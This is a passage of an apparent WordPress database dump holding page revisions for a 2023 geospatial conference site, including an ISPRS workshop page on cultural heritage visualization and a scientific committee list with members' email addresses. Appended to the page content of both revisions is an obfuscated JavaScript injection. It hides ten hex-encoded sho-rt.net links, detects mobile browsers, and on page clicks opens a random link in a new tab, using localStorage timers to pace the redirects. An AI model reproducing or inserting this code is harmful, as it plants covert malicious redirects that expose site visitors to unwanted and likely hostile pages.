abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2023-03-01 23:11:58','2023-03-01 23:11:58','',2876,'https://gsw2023.com/?p=3920',0,'revision','',0),
(3921,1,'2023-03-01 23:19:21','2023-03-01 23:19:21','','29m2','','inherit','open','closed','','29m2','','','2023-03-01 23:19:21','2023-03-01 23:19:21','',3897,'https://gsw2023.com/wp-content/uploads/2023/03/29m2.jpg',0,'attachment','image/jpeg',0),
(3922,1,'2023-03-01 23:19:27','2023-03-01 23:19:27','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\r\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\r\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"74\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong>Themes of Event</strong></h5>\r\n<strong>Cultural heritage cognition and conceptual modeling</strong>\r\n<ul>\r\n 	<li>Cognition and ontology of cultural heritage</li>\r\n 	<li>Data integration and knowledge discovery</li>\r\n 	<li>GIS + HBIM integration of cultural heritage protection methods</li>\r\n 	<li>Visualization of cultural heritage ( Big Data, BIM/CIM, AR/VR/MR, AI)</li>\r\n 	<li>Conceptual modelling</li>\r\n 	<li>Intelligent interaction, visualization, and information update</li>\r\n</ul>\r\n<strong>Deterioration monitoring and assessment of culture heritage</strong>\r\n<ul>\r\n 	<li>Identification, extraction and analysis of heritage deteriorations</li>\r\n 	<li>Deep learning of heritage deteriorations: symptom classification and visualization</li>\r\n 	<li>Dynamic monitoring of heritage deteriorations based on hyperspectral and X-ray techniques</li>\r\n 	<li>Analysis of the causes of heritage deteriorations</li>\r\n 	<li>Immersive heritage deteriorations diagnosis</li>\r\n 	<li>Evaluation and preventive protection of heritage deteriorations</li>\r\n 	<li>Automated deteriorations mapping</li>\r\n</ul>\r\n<strong>Digital twins and virtual restoration of cultural heritage</strong>\r\n<ul>\r\n 	<li>Digital twins</li>\r\n 	<li>Innovation technology of spatio-temporal information of cultural heritage</li>\r\n 	<li>Virtual restoration, recovery, and reconstruction of cultural heritage</li>\r\n 	<li>Digital storytelling presentation and interpretation of cultural heritage (space, material, value)</li>\r\n 	<li>New Methods of Cultural Heritage Protection in the Post-epidemic Era</li>\r\n</ul>\r\n<strong>Heritage sustainability and other applications</strong>\r\n<ul>\r\n 	<li>Cultural heritage conservation and sustainable development based on multi-source information fusion</li>\r\n 	<li>Sustainable development of cultural heritage based on the expansion of existing UNSDGs indicators</li>\r\n 	<li>Digital cultural heritage applications and services</li>\r\n 	<li>Innovating immersive experience and the industry of culture and tourism</li>\r\n 	<li>Contextual education of cultural heritage</li>\r\n 	<li>Digital cultural heritage interactive conservation with Public Participation</li>\r\n 	<li>Archaeological prospecting using spatial technologies, including remote sensing, GIS, and GNSS.</li>\r\n 	<li>AI-powered identification of archaeological sites and/or landscapes</li>\r\n 	<li>Spatial analysis of the past human-enviroment interactions</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Scientific Committee</strong></h5>\r\n<ol>\r\n 	<li>Junshan Liu, McWhorter School of Building Science, Auburn University, USA.junshan.liu@auburn.edu</li>\r\n 	<li>Andreas Georgopoulos, Department of National Technical University of Athens, Laboratory of Photogrammetry, Greece, Email: <a href=\"mailto:drag@central.ntua.gr\">drag@central.ntua.gr</a></li>\r\n 	<li>AnRong Dang, Department of School of Architecture in Tsinghua University, China, Email: danrong@mail.tsinghua.edu.cn</li>\r\n 	<li>Bolognesi, Cecilia Maria, Department of Architecture, Built environment and Construction engineering (A.B.C.) , Politecnico di Milano, Milano, Italy, Email: <a href=\"mailto:cecilia.bolognesi@polimi.it\">bolognesi@polimi.it</a></li>\r\n 	<li>Chen Yang, Department of Tongji University, China, Email: <a href=\"mailto:chen.yang@tongji.edu.cn\">yang@tongji.edu.cn</a></li>\r\n 	<li>Fulong Chen, Department of The Aerospace Information Research Institute, China, Email: <a href=\"mailto:chenfl@aircas.ac.cn\">chenfl@aircas.ac.cn</a></li>\r\n 	<li>Grussenmeyer, Pierre, Department of Université de Strasbourg, INSA Strasbourg, CNRS, ICube Laboratory UMR 7357, Photogrammetry and Geomatics Group, 67000 Strasbourg, France, Email: <a href=\"mailto:pierre.grussenmeyer@insa-strasbourg.fr\">grussenmeyer@insa-strasbourg.fr</a></li>\r\n 	<li>Hallot, Pierre, Department of DIVA Art Archeology Heritage University of Liège, Belgian,Email: <a href=\"mailto:p.hallot@uliege.be\">hallot@uliege.be</a></li>\r\n 	<li>Hongtao Liu, Department of World Heritage Research Center in Southwest Jiaotong University, China, Email: <a href=\"mailto:bridge115@126.com\">bridge115@126.com</a></li>\r\n 	<li>Jie He, Department of School of Architecture in Tianjin University, China, Email: janushe@tju.edu.cn</li>\r\n 	<li>Long Ying, Department of School of Architecture in Tsinghua University,China, Email: <a href=\"mailto:ylong@mail.tsinghua.edu.cn\">ylong@mail.tsinghua.edu.cn</a></li>\r\n 	<li>Ona Vileikis, Department of University College London (UCL), England, Email: <a href=\"mailto:o.vileikis@ucl.ac.uk\">vileikis@ucl.ac.uk</a></li>\r\n 	<li>Prafulla Tarachand Janbade, Department of Chandigarh College of Architecture, India, Email: <a href=\"mailto:prafullatj@gmail.com\">prafullatj@gmail.com</a></li>\r\n 	<li>Tiwari, Reena,Department of Curtin University, Australia, Email: <a href=\"mailto:r.tiwari@curtin.edu.au\">r.tiwari@curtin.edu.au</a></li>\r\n 	<li>Victor Ferreira, Department of Lisbon School of Architecture, Lisbon, Email: <a href=\"mailto:victor.mota.ferreira@gmail.com\">victor.mota.ferreira@gmail.com</a></li>\r\n 	<li>Yuhua Wu, Department of Chinese Academy of Cultural Heritage, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">wuyuhua@cach.org.cn</a></li>\r\n 	<li>Shuqiang Lv, Department of Survey and Mapping, BUCEA, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">lvshuqiang@b</a>ucea.edu.cn</li>\r\n</ol>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 23:19:27','2023-03-01 23:19:27','',3897,'https://gsw2023.com/?p=3922',0,'revision','',0),
(3923,1,'2023-03-01 23:21:40','2023-03-01 23:21:40','','29m22','','inherit','open','closed','','29m22','','','2023-03-01 23:21:40','2023-03-01 23:21:40','',3897,'https://gsw2023.com/wp-content/uploads/2023/03/29m22.jpg',0,'attachment','image/jpeg',0),
